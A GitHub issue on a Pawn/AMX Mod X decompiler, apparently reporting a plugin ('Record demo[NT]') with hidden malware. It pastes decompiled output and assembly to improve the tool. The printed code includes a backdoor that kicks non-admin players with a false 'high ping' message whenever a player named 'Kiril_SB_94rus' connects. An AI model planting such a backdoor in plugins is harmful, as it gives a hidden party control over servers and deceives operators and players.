Hidden malware in .amxx! #38
Description
Your lysis version output:
new MaxClients;
new NULL_STRING;
new NULL_VECTOR;
new g_var14 = 3;
new g_vara4;
new g_var12c;
public client_disconnected(_arg0)
{
remove_task(_arg0, MaxClients);
return 0;
}
public client_putinserver(_arg0)
{
new var1;
if (is_user_bot(_arg0) && is_user_hltv(_arg0))
{
return 0;
}
sub_11f4(_arg0);
set_task(float(g_var14), "launching_demo", _arg0, 1048, MaxClients, 1052, MaxClients);
return 0;
}
My version output:
new MaxClients;
new NULL_STRING;
new NULL_VECTOR;
new g_var14 = 3;
new g_vara4;
new g_var12c;
public client_disconnected(_arg0)
{
new var1 = _arg0;
remove_task(var1, MaxClients);
return 0;
}
public client_putinserver(_arg0)
{
new var2 = _arg0;
new var1;
if (is_user_bot(var2) && is_user_hltv(var3))
{
return 0;
}
new var4 = _arg0;
sub_11f4(var4);
new var5 = _arg0;
new var6 = g_var14;
new var7 = float(var6);
set_task(var7, "launching_demo", var5, 1048, MaxClients, 1052, MaxClients);
return 0;
}
public create_menu(_arg0)
{
new var4 = _arg0;
new var1;
if (is_user_connected(var4) && get_user_flags(var5, MaxClients) & 1048576)
{
new var6;
var6 = menu_create(1772, "handler_menu", MaxClients);
new var7 = (Heap);
fmt(1984, g_var14);
new var8 = var6;
menu_additem(var8, var7, 2164, MaxClients, -1);
new var9 = (Heap);
new var2;
if (!24/* ERROR unknown load Constant */)
{
var2 = 2348;
}
else
{
var2 = 2368;
}
fmt(2172, var2);
new var10 = var6;
menu_additem(var10, var9, 2384, MaxClients, -1);
new var11 = (Heap);
new var3;
if (!24 + 4/* ERROR unknown load Binary */)
{
var3 = 2532;
}
else
{
var3 = 2548;
}
fmt(2392, var3);
new var12 = var6;
menu_additem(var12, var11, 2624, MaxClients, -1);
new var13 = var6;
menu_additem(var13, 2632, 2804, MaxClients, -1);
new var14 = var6;
menu_setprop(var14, NULL_STRING, 2812);
new var15 = var6;
new var16 = _arg0;
menu_display(var16, var15, MaxClients, -1);
}
return 0;
}
public handler_menu(_arg0, _arg1, _arg2)
{
new var2 = _arg1;
menu_destroy(var2);
new var3 = _arg0;
new var1;
if (is_user_connected(var3) && _arg2 != -3)
{
if (!_arg2)
{
g_var14 += 1;
if (g_var14 == 11)
{
g_var14 = 3;
}
}
else
{
new var4 = _arg2;
new var5 = 0 < var4;
if (3 > var4 & var5)
{
new var6 = 24[_arg2 + -1];
var6 ^= 1;
}
g_var14 = 3;
arrayset(24, MaxClients, 2);
}
new var7 = _arg0;
create_menu(var7);
}
return 0;
}
public launching_demo(_arg0)
{
new var2 = 0;
if (24 + 4/* ERROR unknown load Binary */)
{
get_time("%X", var2, 32);
sub_8(var2, 32, 1068, 1076);
}
new var3 = 0;
new var1;
if (!24 + 4/* ERROR unknown load Binary */)
{
var1 = 32;
}
else
{
var1 = var2;
}
format(var3, 32, "%s_%s", var1, 168);
if (!24/* ERROR unknown load Constant */)
{
new var4 = (Heap);
new var5 = (Heap);
var5 = _arg0;
fmt(1108, var5, var3);
new var6 = _arg0;
sub_1450(var6, var4);
}
else
{
new var7 = (Heap);
set_hudmessage(g_vara4, g_vara4, g_vara4, -1082130432, 1057803469, MaxClients, 1086324736, 1088421888, 1036831949, 1045220557, -1, MaxClients, var7);
new var8 = (Heap);
var8 = _arg0;
new var9 = g_vara4;
new var10 = _arg0;
ShowSyncHudMsg(var10, var9, 1432, var8, var3);
}
new var11 = _arg0;
client_cmd(var11, "stop; record \"%s\"", var3);
return 0;
}
public plugin_cfg()
{
new var1 = create_cvar("name_demo", "server", MaxClients, 816, MaxClients, MaxClients, MaxClients, MaxClients);
bind_pcvar_string(var1, 168, 32);
AutoExecConfig(1, "Record demo[NT]", 984);
return 0;
}
public plugin_end()
{
new var1 = (Heap);
new var2 = 24 + 4;
fmt("%i %i %i", g_var14, 24, var2);
new var3 = g_var12c;
nvault_set(var3, 684, var1);
new var4 = g_var12c;
nvault_close(var4);
return 0;
}
public plugin_init()
{
new var1;
new var2 = var1;
register_plugin("Record demo[NT]", "rz 0.4", var2);
register_clcmd("settings_demorecord", "create_menu", -1, 596, -1, MaxClients);
get_mapname(32, 32);
g_vara4 = CreateHudSyncObj(MaxClients);
g_var12c = nvault_open("RecordDemo");
sub_414();
return 0;
}
sub_11f4(_arg0)
{
new var1 = 0;
new var2 = _arg0;
get_user_name(var2, var1, 32);
if (equal(var1, "Kiril_SB_94rus", MaxClients))
{
new var3 = 0;
new var4 = 0;
get_players(var3, var4, 2916, 2924);
new var5 = 0;
while (var5 < var4)
{
new var6 = var3[var5];
if (!(get_user_flags(var6, MaxClients) & 1048576))
{
if (!(var5 == 3))
{
new var7 = var3[var5];
new var8 = (Heap);
var8 = get_user_userid(var7);
server_cmd("kick #%d You have a high ping", var8);
}
}
var5++;
}
}
return 0;
}
sub_8(_arg0, _arg1, _arg2, _arg3)
{
new var1 = 0;
new var2 = _arg2;
new var3 = _arg0;
if ((var1 = contain(var3, var2)) == -1)
{
return 0;
}
new var4 = 0;
new var5;
new var6 = _arg3;
var5 = strlen(var6);
new var7;
new var8 = _arg2;
var7 = strlen(var8) - var5;
new var9;
new var10 = _arg0;
var9 = strlen(var10);
new var11 = 0;
new var12 = _arg3;
new var13 = _arg2;
new var14 = _arg1 - var1;
new var15 = _arg0[var1];
while (replace(var15, var14, var13, var12))
{
var4++;
var1 = var5 + var1;
var9 -= var7;
if (!(var1 >= var9))
{
new var16 = _arg2;
new var17 = _arg0[var1];
var11 = contain(var17, var16);
if (!(var11 == -1))
{
var1 = var11 + var1;
}
return var4;
}
return var4;
}
return var4;
}
sub_1450(_arg0, _arg1)
{
return (void);
}
sub_414()
{
new var1 = 0;
new var2 = (Heap);
var2 = 32;
new var3 = g_var12c;
if (nvault_get(var3, "SAVE_:", var1, var2))
{
new var4 = 0;
new var5 = (Heap);
var5 = 2;
new var6 = var4 + 8;
new var7 = var6 + var6;
new var8 = (Heap);
var8 = 2;
new var9 = var4 + 4;
new var10 = var9 + var9;
new var11 = (Heap);
var11 = 2;
new var12 = var4 + var4;
parse(var1, var12, var11, var10, var8, var7, var5);
new var13 = var4 + var4;
g_var14 = str_to_num(var13);
new var14 = var4 + 4;
new var15 = var14 + var14;
24/* ERROR unknown load Constant */ = str_to_num(var15);
new var16 = 24 + 4;
new var17 = var4 + 8;
new var18 = var17 + var17;
var16 = str_to_num(var18);
}
return 0;
}
Assembly output:
.TAGS
?rl_nvault
?f_nvault
Float
.PUBLIC
plugin_init
plugin_end
plugin_cfg
client_putinserver
launching_demo
create_menu
handler_menu
client_disconnected
.NATIVE
contain
strlen
replace
register_plugin
register_clcmd
get_mapname
CreateHudSyncObj
nvault_open
nvault_get
parse
str_to_num
fmt
nvault_set
nvault_close
create_cvar
bind_pcvar_string
AutoExecConfig
is_user_bot
is_user_hltv
float
set_task
get_time
format
set_hudmessage
ShowSyncHudMsg
client_cmd
is_user_connected
get_user_flags
menu_create
menu_additem
menu_setprop
menu_display
menu_destroy
arrayset
remove_task
get_user_name
equal
get_players
get_user_userid
server_cmd
message_begin
write_byte
write_string
message_end
.PUBVAR
MaxClients
NULL_STRING
NULL_VECTOR
.DATA
variable MaxClients ( 0x00 )
variable NULL_STRING ( 0x00 )
array 3 NULL_VECTOR fill 0x00
variable var_00000 ( 0x03 )
array 2 arr_00000 fill 0x00
array 11 arr_00001 fill 0x00
array 22 arr_00002 fill 0x00
variable var_00001 ( 0x00 )
array 33 arr_00003 fill 0x00
variable var_00002 ( 0x00 )
array 18 arr_00004 ( 0x28, 0x3a, 0x20, 0x5b, 0x43, 0x5d, 0x5b, 0x4f, 0x5d, 0x5b, 0x44, 0x5d, 0x5b, 0x45, 0x5d, 0x20, 0x78, 0x00 )
string str_00000 "Record demo[NT]"
string str_00001 "rz 0.4"
string str_00002 "settings_demorecord"
string str_00003 "create_menu"
variable var_00003 ( 0x00 )
string str_00004 "RecordDemo"
string str_00005 "SAVE_:"
array 3 arr_00005 ( 0x0c, 0x14, 0x1c )
string str_00006 "SAVE_:"
string str_00007 "%i %i %i"
string str_00008 "name_demo"
string str_00009 "server"
array 26 arr_00006 ( 0xffffffd0, 0xffffff9d, 0xffffffd0, 0xffffffb0, 0xffffffd0, 0xffffffb7, 0xffffffd0, 0xffffffb2, 0xffffffd0, 0xffffffb0, 0xffffffd0, 0xffffffbd, 0xffffffd0, 0xffffffb8, 0xffffffd0, 0xffffffb5, 0x20, 0xffffffd0, 0xffffffb4, 0xffffffd0, 0xffffffb5, 0xffffffd0, 0xffffffbc, 0xffffffd0, 0xffffffbe, 0x00 )
string str_00010 "Record demo[NT]"
variable var_00004 ( 0x00 )
string str_00011 "launching_demo"
variable var_00005 ( 0x00 )
variable var_00006 ( 0x00 )
string str_00012 "%X"
string str_00013 ":"
string str_00014 "_"
string str_00015 "%s_%s"
array 77 arr_00007 ( 0x01, 0x28, 0x04, 0x52, 0x45, 0x43, 0x01, 0x29, 0x20, 0x03, 0xffffffd0, 0xffffff92, 0xffffffd0, 0xffffffbd, 0xffffffd0, 0xffffffb8, 0xffffffd0, 0xffffffbc, 0xffffffd0, 0xffffffb0, 0xffffffd0, 0xffffffbd, 0xffffffd0, 0xffffffb8, 0xffffffd0, 0xffffffb5, 0x20, 0x25, 0x6e, 0x2c, 0x20, 0xffffffd0, 0xffffffbd, 0xffffffd0, 0xffffffb0, 0xffffffd1, 0xffffff87, 0xffffffd0, 0xffffffb0, 0xffffffd0, 0xffffffbb, 0xffffffd0, 0xffffffb0, 0xffffffd1, 0xffffff81, 0xffffffd1, 0xffffff8c, 0x20, 0xffffffd0, 0xffffffb7, 0xffffffd0, 0xffffffb0, 0xffffffd0, 0xffffffbf, 0xffffffd0, 0xffffffb8, 0xffffffd1, 0xffffff81, 0xffffffd1, 0xffffff8c, 0x20, 0xffffffd0, 0xffffffb4, 0xffffffd0, 0xffffffb5, 0xffffffd0, 0xffffffbc, 0xffffffd0, 0xffffffbe, 0x20, 0x25, 0x73, 0x2e, 0x64, 0x65, 0x6d, 0x00 )
array 4 arr_00008 ( 0xff, 0xff, 0xfa, 0x00 )
array 67 arr_00009 ( 0xffffffd0, 0xffffff92, 0xffffffd0, 0xffffffbd, 0xffffffd0, 0xffffffb8, 0xffffffd0, 0xffffffbc, 0xffffffd0, 0xffffffb0, 0xffffffd0, 0xffffffbd, 0xffffffd0, 0xffffffb8, 0xffffffd0, 0xffffffb5, 0x20, 0x25, 0x6e, 0x2c, 0x20, 0xffffffd0, 0xffffffbd, 0xffffffd0, 0xffffffb0, 0xffffffd1, 0xffffff87, 0xffffffd0, 0xffffffb0, 0xffffffd0, 0xffffffbb, 0xffffffd0, 0xffffffb0, 0xffffffd1, 0xffffff81, 0xffffffd1, 0xffffff8c, 0x20, 0xffffffd0, 0xffffffb7, 0xffffffd0, 0xffffffb0, 0xffffffd0, 0xffffffbf, 0xffffffd0, 0xffffffb8, 0xffffffd1, 0xffffff81, 0xffffffd1, 0xffffff8c, 0x20, 0xffffffd0, 0xffffffb4, 0xffffffd0, 0xffffffb5, 0xffffffd0, 0xffffffbc, 0xffffffd0, 0xffffffbe, 0x20, 0x25, 0x73, 0x2e, 0x64, 0x65, 0x6d, 0x00 )
string str_00016 "stop; record \"%s\""
array 40 arr_00010 ( 0x5c, 0x79, 0xffffffd0, 0xffffff9d, 0xffffffd0, 0xffffffb0, 0xffffffd1, 0xffffff81, 0xffffffd1, 0xffffff82, 0xffffffd1, 0xffffff80, 0xffffffd0, 0xffffffbe, 0xffffffd0, 0xffffffb9, 0x20, 0xffffffd0, 0xffffffbc, 0xffffffd0, 0xffffffb5, 0xffffffd0, 0xffffffbd, 0xffffffd1, 0xffffff8e, 0x20, 0x5c, 0x77, 0x44, 0x45, 0x4d, 0x4f, 0x0d, 0x52, 0x45, 0x43, 0x4f, 0x52, 0x44, 0x00 )
string str_00017 "handler_menu"
array 45 arr_00011 ( 0xffffffd0, 0xffffff92, 0xffffffd1, 0xffffff80, 0xffffffd0, 0xffffffb5, 0xffffffd0, 0xffffffbc, 0xffffffd1, 0xffffff8f, 0x20, 0xffffffd0, 0xffffffb7, 0xffffffd0, 0xffffffb0, 0xffffffd0, 0xffffffbf, 0xffffffd1, 0xffffff83, 0xffffffd1, 0xffffff81, 0xffffffd0, 0xffffffba, 0xffffffd0, 0xffffffb0, 0x20, 0x5c, 0x64, 0x3c, 0x5c, 0x79, 0x25, 0x69, 0x20, 0xffffffd1, 0xffffff81, 0xffffffd0, 0xffffffb5, 0xffffffd0, 0xffffffba, 0x2e, 0x5c, 0x64, 0x3e, 0x00 )
string str_00018 "1"
array 44 arr_00012 ( 0xffffffd0, 0xffffffa2, 0xffffffd0, 0xffffffb8, 0xffffffd0, 0xffffffbf, 0x20, 0xffffffd0, 0xffffffbe, 0xffffffd0, 0xffffffbf, 0xffffffd0, 0xffffffbe, 0xffffffd0, 0xffffffb2, 0xffffffd0, 0xffffffb5, 0xffffffd1, 0xffffff89, 0xffffffd0, 0xffffffb0, 0xffffffd0, 0xffffffbd, 0xffffffd0, 0xffffffb8, 0xffffffd1, 0xffffff8f, 0x20, 0x5c, 0x64, 0x3c, 0x5c, 0x79, 0x25, 0x73, 0x5f, 0x3a, 0x4d, 0x53, 0x47, 0x5c, 0x64, 0x3e, 0x00 )
string str_00019 "CHAT"
string str_00020 "HUD"
string str_00021 "2"
array 35 arr_00013 ( 0xffffffd0, 0xffffffa2, 0xffffffd0, 0xffffffb8, 0xffffffd0, 0xffffffbf, 0x20, 0x70, 0x72, 0x65, 0x66, 0x69, 0x78, 0x20, 0x5c, 0x64, 0x3c, 0x5c, 0x79, 0x25, 0x73, 0x5f, 0x6e, 0x61, 0x6d, 0x65, 0x2e, 0x64, 0x65, 0x6d, 0x5c, 0x64, 0x3e, 0x0a, 0x00 )
string str_00022 "map"
string str_00023 "hour:minute:second"
string str_00024 "3"
array 43 arr_00014 ( 0xffffffd0, 0xffffff9d, 0xffffffd0, 0xffffffb0, 0xffffffd1, 0xffffff81, 0xffffffd1, 0xffffff82, 0xffffffd1, 0xffffff80, 0xffffffd0, 0xffffffbe, 0xffffffd0, 0xffffffb9, 0xffffffd0, 0xffffffba, 0xffffffd0, 0xffffffb8, 0x20, 0xffffffd0, 0xffffffbf, 0xffffffd0, 0xffffffbe, 0x20, 0xffffffd1, 0xffffff83, 0xffffffd0, 0xffffffbc, 0xffffffd0, 0xffffffbe, 0xffffffd0, 0xffffffbb, 0xffffffd1, 0xffffff87, 0xffffffd0, 0xffffffb0, 0xffffffd0, 0xffffffbd, 0xffffffd0, 0xffffffb8, 0xffffffd1, 0xffffff8e, 0x00 )
string str_00025 "4"
array 11 arr_00015 ( 0xffffffd0, 0xffffff92, 0xffffffd1, 0xffffff8b, 0xffffffd1, 0xffffff85, 0xffffffd0, 0xffffffbe, 0xffffffd0, 0xffffffb4, 0x00 )
string str_00026 "Kiril_SB_94rus"
string str_00027 "h"
variable var_00007 ( 0x00 )
string str_00028 "kick #%d You have a high ping"
array 3 arr_00016 fill 0x00
.CODE
halt 0x00
proc func_00000
break
break
push.c 0x00
break
push.s 0x14
push.s 0x0c
push.c 0x08
sysreq.c contain
stack 0x0c
stor.s.pri 0xfffffffc
eq.c.pri 0xffffffff
jzer .label00000
break
zero.pri
stack 0x04
retn
.label00000:
break
push.c 0x00
break
stack 0xfffffffc
push.s 0x18
push.c 0x04
sysreq.c strlen
stack 0x08
stor.s.pri 0xfffffff4
break
stack 0xfffffffc
push.s 0x14
push.c 0x04
sysreq.c strlen
stack 0x08
move.alt
load.s.pri 0xfffffff4
sub.alt
stor.s.pri 0xfffffff0
break
stack 0xfffffffc
push.s 0x0c
push.c 0x04
sysreq.c strlen
stack 0x08
stor.s.pri 0xffffffec
break
push.c 0x00
break
.label00004:
break
push.s 0x18
push.s 0x14
load.s.pri 0xfffffffc
load.s.alt 0x10
sub.alt
push.pri
load.s.pri 0xfffffffc
load.s.alt 0x0c
idxaddr
push.pri
push.c 0x10
sysreq.c replace
stack 0x14
jzer .label00001
break
inc.s 0xfffffff8
break
load.s.pri 0xfffffff4
load.s.alt 0xfffffffc
add
stor.s.pri 0xfffffffc
break
load.s.pri 0xfffffff0
load.s.alt 0xffffffec
sub.alt
stor.s.pri 0xffffffec
break
load.s.pri 0xfffffffc
load.s.alt 0xffffffec
jsless .label00002
break
jump .label00001
.label00002:
break
push.s 0x14
load.s.pri 0xfffffffc
load.s.alt 0x0c
idxaddr
push.pri
push.c 0x08
sysreq.c contain
stack 0x0c
stor.s.pri 0xffffffe8
break
load.s.pri 0xffffffe8
eq.c.pri 0xffffffff
jzer .label00003
break
jump .label00001
.label00003:
break
load.s.pri 0xffffffe8
load.s.alt 0xfffffffc
add
stor.s.pri 0xfffffffc
jump .label00004
.label00001:
break
load.s.pri 0xfffffff8
stack 0x18
retn
endproc
proc plugin_init
break
break
stack 0xffffffb8
const.pri arr_00004
addr.alt 0xffffffb8
movs 0x48
break
pushaddr 0xffffffb8
push.c str_00001
push.c str_00000
push.c 0x0c
sysreq.c register_plugin
stack 0x10
break
push.c 0x00
push.c 0xffffffff
push.c var_00003
push.c 0xffffffff
push.c str_00003
push.c str_00002
push.c 0x18
sysreq.c register_clcmd
stack 0x1c
break
push.c arr_00001
push.c arr_00001
push.c 0x08
sysreq.c get_mapname
stack 0x0c
break
push.c 0x00
push.c 0x04
sysreq.c CreateHudSyncObj
stack 0x08
stor.pri 0xa4
break
push.c str_00004
push.c 0x04
sysreq.c nvault_open
stack 0x08
stor.pri 0x12c
break
push.c 0x00
call func_00001
stack 0x48
zero.pri
retn
endproc
proc func_00001
break
break
stack 0xffffff7c
zero.pri
addr.alt 0xffffff7c
fill 0x84
break
const.pri arr_00001
heap 0x04
stor.i
push.alt
pushaddr 0xffffff7c
push.c str_00005
push var_00002
push.c 0x10
sysreq.c nvault_get
stack 0x14
heap 0xfffffffc
jzer .label00005
break
stack 0xffffffd0
zero.pri
addr.alt 0xffffff4c
fill 0x30
const.pri arr_00005
addr.alt 0xffffff4c
movs 0x0c
break
const.pri 0x02
heap 0x04
stor.i
push.alt
addr.pri 0xffffff4c
add.c 0x08
move.alt
load.i
add
push.pri
const.pri 0x02
heap 0x04
stor.i
push.alt
addr.pri 0xffffff4c
add.c 0x04
move.alt
load.i
add
push.pri
const.pri 0x02
heap 0x04
stor.i
push.alt
addr.pri 0xffffff4c
move.alt
load.i
add
push.pri
pushaddr 0xffffff7c
push.c 0x1c
sysreq.c parse
stack 0x20
heap 0xfffffff4
break
addr.pri 0xffffff4c
move.alt
load.i
add
push.pri
push.c 0x04
sysreq.c str_to_num
stack 0x08
stor.pri 0x14
break
const.pri arr_00000
push.pri
addr.pri 0xffffff4c
add.c 0x04
move.alt
load.i
add
push.pri
push.c 0x04
sysreq.c str_to_num
stack 0x08
pop.alt
stor.i
break
const.pri arr_00000
add.c 0x04
push.pri
addr.pri 0xffffff4c
add.c 0x08
move.alt
load.i
add
push.pri
push.c 0x04
sysreq.c str_to_num
stack 0x08
pop.alt
stor.i
stack 0x30
.label00005:
stack 0x84
zero.pri
retn
endproc
proc plugin_end
break
break
heap 0x400
push.alt
const.pri arr_00000
add.c 0x04
push.pri
push.c arr_00000
push.c var_00000
push.c str_00007
push.c 0x10
sysreq.c fmt
stack 0x14
pop.pri
push.pri
push.c str_00006
push var_00002
push.c 0x0c
sysreq.c nvault_set
stack 0x10
heap 0xfffffc00
break
push var_00002
push.c 0x04
sysreq.c nvault_close
stack 0x08
zero.pri
retn
endproc
proc plugin_cfg
break
break
push.c arr_00001
push.c arr_00003
push.c 0x00
push.c 0x00
push.c 0x00
push.c 0x00
push.c arr_00006
push.c 0x00
push.c str_00009
push.c str_00008
push.c 0x20
sysreq.c create_cvar
stack 0x24
push.pri
push.c 0x0c
sysreq.c bind_pcvar_string
stack 0x10
break
push.c var_00004
push.c str_00010
push.c 0x01
push.c 0x0c
sysreq.c AutoExecConfig
stack 0x10
zero.pri
retn
endproc
proc client_putinserver
break
break
push.s 0x0c
push.c 0x04
sysreq.c is_user_bot
stack 0x08
jzer .label00006
push.s 0x0c
push.c 0x04
sysreq.c is_user_hltv
stack 0x08
jzer .label00006
const.pri 0x01
jump .label00007
.label00006:
zero.pri
.label00007:
jzer .label00008
break
zero.pri
retn
.label00008:
break
push.s 0x0c
push.c NULL_STRING
call func_00002
break
push.c 0x00
push.c var_00006
push.c 0x00
push.c var_00005
push.s 0x0c
push.c str_00011
push var_00000
push.c 0x04
sysreq.c float
stack 0x08
push.pri
push.c 0x1c
sysreq.c set_task
stack 0x20
zero.pri
retn
endproc
proc launching_demo
break
break
stack 0xffffff7c
zero.pri
addr.alt 0xffffff7c
fill 0x84
break
const.pri arr_00000
add.c 0x04
load.i
jzer .label00009
break
push.c arr_00001
pushaddr 0xffffff7c
push.c str_00012
push.c 0x0c
sysreq.c get_time
stack 0x10
break
push.c str_00014
push.c str_00013
push.c arr_00001
pushaddr 0xffffff7c
push.c 0x10
call func_00000
.label00009:
break
stack 0xffffff7c
zero.pri
addr.alt 0xfffffef8
fill 0x84
break
push.c arr_00003
const.pri arr_00000
add.c 0x04
load.i
not
jzer .label00010
const.pri arr_00001
jump .label00011
.label00010:
addr.pri 0xffffff7c
.label00011:
push.pri
push.c str_00015
push.c arr_00001
pushaddr 0xfffffef8
push.c 0x14
sysreq.c format
stack 0x18
break
const.pri arr_00000
load.i
not
jzer .label00012
break
heap 0x400
push.alt
pushaddr 0xfffffef8
load.s.pri 0x0c
heap 0x04
stor.i
push.alt
push.c arr_00007
push.c 0x0c
sysreq.c fmt
stack 0x10
heap 0xfffffffc
pop.pri
push.pri
push.s 0x0c
push.c NULL_VECTOR
call func_00003
heap 0xfffffc00
jump .label00013
.label00012:
break
const.pri arr_00008
heap 0x10
movs 0x10
push.alt
push.c 0x00
push.c 0xffffffff
push.c 0x3e4ccccd
push.c 0x3dcccccd
push.c 0x40e00000
push.c 0x40c00000
push.c 0x00
push.c 0x3f0ccccd
push.c 0xbf800000
push.c var_00001
push.c var_00001
push.c var_00001
push.c 0x34
sysreq.c set_hudmessage
stack 0x38
heap 0xfffffff0
break
pushaddr 0xfffffef8
load.s.pri 0x0c
heap 0x04
stor.i
push.alt
push.c arr_00009
push var_00001
push.s 0x0c
push.c 0x14
sysreq.c ShowSyncHudMsg
stack 0x18
heap 0xfffffffc
.label00013:
break
pushaddr 0xfffffef8
push.c str_00016
push.s 0x0c
push.c 0x0c
sysreq.c client_cmd
stack 0x10
stack 0x108
zero.pri
retn
endproc
proc create_menu
break
break
push.s 0x0c
push.c 0x04
sysreq.c is_user_connected
stack 0x08
jzer .label00014
push.c 0x00
push.s 0x0c
push.c 0x08
sysreq.c get_user_flags
stack 0x0c
const.alt 0x100000
and
jzer .label00014
const.pri 0x01
jump .label00015
.label00014:
zero.pri
.label00015:
jzer .label00016
break
stack 0xfffffffc
push.c 0x00
push.c str_00017
push.c arr_00010
push.c 0x0c
sysreq.c menu_create
stack 0x10
stor.s.pri 0xfffffffc
break
push.c 0xffffffff
push.c 0x00
push.c str_00018
heap 0x400
push.alt
push.c var_00000
push.c arr_00011
push.c 0x08
sysreq.c fmt
stack 0x0c
pop.pri
push.pri
push.s 0xfffffffc
push.c 0x14
sysreq.c menu_additem
stack 0x18
heap 0xfffffc00
break
push.c 0xffffffff
push.c 0x00
push.c str_00021
heap 0x400
push.alt
const.pri arr_00000
load.i
not
jzer .label00017
const.pri str_00019
jump .label00018
.label00017:
const.pri str_00020
.label00018:
push.pri
push.c arr_00012
push.c 0x08
sysreq.c fmt
stack 0x0c
pop.pri
push.pri
push.s 0xfffffffc
push.c 0x14
sysreq.c menu_additem
stack 0x18
heap 0xfffffc00
break
push.c 0xffffffff
push.c 0x00
push.c str_00024
heap 0x400
push.alt
const.pri arr_00000
add.c 0x04
load.i
not
jzer .label00019
const.pri str_00022
jump .label00020
.label00019:
const.pri str_00023
.label00020:
push.pri
push.c arr_00013
push.c 0x08
sysreq.c fmt
stack 0x0c
pop.pri
push.pri
push.s 0xfffffffc
push.c 0x14
sysreq.c menu_additem
stack 0x18
heap 0xfffffc00
break
push.c 0xffffffff
push.c 0x00
push.c str_00025
push.c arr_00014
push.s 0xfffffffc
push.c 0x14
sysreq.c menu_additem
stack 0x18
break
push.c arr_00015
push.c NULL_STRING
push.s 0xfffffffc
push.c 0x0c
sysreq.c menu_setprop
stack 0x10
break
push.c 0xffffffff
push.c 0x00
push.s 0xfffffffc
push.s 0x0c
push.c 0x10
sysreq.c menu_display
stack 0x14
stack 0x04
.label00016:
zero.pri
retn
endproc
proc handler_menu
break
break
push.s 0x10
push.c 0x04
sysreq.c menu_destroy
stack 0x08
break
push.s 0x0c
push.c 0x04
sysreq.c is_user_connected
stack 0x08
jzer .label00021
load.s.pri 0x14
const.alt 0xfffffffd
jeq .label00021
const.pri 0x01
jump .label00022
.label00021:
zero.pri
.label00022:
jzer .label00023
break
load.s.pri 0x14
not
jzer .label00024
break
inc 0x14
load.pri 0x14
eq.c.pri 0x0b
jzer .label00025
break
const.pri 0x03
stor.pri 0x14
.label00025:
jump .label00026
.label00024:
break
load.s.pri 0x14
zero.alt
xchg
sless
push.pri
const.pri 0x03
sgrtr
pop.alt
and
jzer .label00027
break
const.pri arr_00000
push.pri
load.s.pri 0x14
add.c 0xffffffff
bounds 0x01
pop.alt
idxaddr
push.pri
load.i
const.alt 0x01
xor
pop.alt
stor.i
jump .label00026
.label00027:
break
const.pri 0x03
stor.pri 0x14
break
push.c 0x02
push.c 0x00
push.c arr_00000
push.c 0x0c
sysreq.c arrayset
stack 0x10
.label00026:
break
push.s 0x0c
push.c NULL_STRING
call create_menu
.label00023:
zero.pri
retn
endproc
proc client_disconnected
break
break
push.c 0x00
push.s 0x0c
push.c 0x08
sysreq.c remove_task
stack 0x0c
zero.pri
retn
endproc
proc func_00002
break
break
stack 0xffffff7c
zero.pri
addr.alt 0xffffff7c
fill 0x84
break
push.c arr_00001
pushaddr 0xffffff7c
push.s 0x0c
push.c 0x0c
sysreq.c get_user_name
stack 0x10
break
push.c 0x00
push.c str_00026
pushaddr 0xffffff7c
push.c 0x0c
sysreq.c equal
stack 0x10
jzer .label00028
break
stack 0xffffff80
zero.pri
addr.alt 0xfffffefc
fill 0x80
push.c 0x00
break
push.c var_00007
push.c str_00027
pushaddr 0xfffffef8
pushaddr 0xfffffefc
push.c 0x10
sysreq.c get_players
stack 0x14
break
push.c 0x00
jump .label00029
.label00032:
break
inc.s 0xfffffef4
.label00029:
load.s.pri 0xfffffef4
load.s.alt 0xfffffef8
jsgeq .label00030
break
push.c 0x00
addr.alt 0xfffffefc
load.s.pri 0xfffffef4
bounds 0x1f
lidx
push.pri
push.c 0x08
sysreq.c get_user_flags
stack 0x0c
const.alt 0x100000
and
jzer .label00031
break
jump .label00032
.label00031:
break
load.s.pri 0xfffffef4
eq.c.pri 0x03
jzer .label00033
break
jump .label00030
.label00033:
break
addr.alt 0xfffffefc
load.s.pri 0xfffffef4
bounds 0x1f
lidx
push.pri
push.c 0x04
sysreq.c get_user_userid
stack 0x08
heap 0x04
stor.i
push.alt
push.c str_00028
push.c 0x08
sysreq.c server_cmd
stack 0x0c
heap 0xfffffffc
jump .label00032
.label00030:
stack 0x04
stack 0x84
.label00028:
stack 0x84
zero.pri
retn
endproc
proc func_00003
break
break
push.s 0x0c
push.c arr_00016
push.c arr_00002
push.c NULL_VECTOR
push.c 0x10
sysreq.c message_begin
stack 0x14
break
push.s 0x0c
push.c 0x04
sysreq.c write_byte
stack 0x08
break
push.s 0x10
push.c 0x04
sysreq.c write_string
stack 0x08
break
push.c 0x00
sysreq.c message_end
stack 0x04
zero.pri
retn
Files:
Record_demo[NT]+MALWARE.zip
@peace-maker you can fix it ? (remove dead code issue)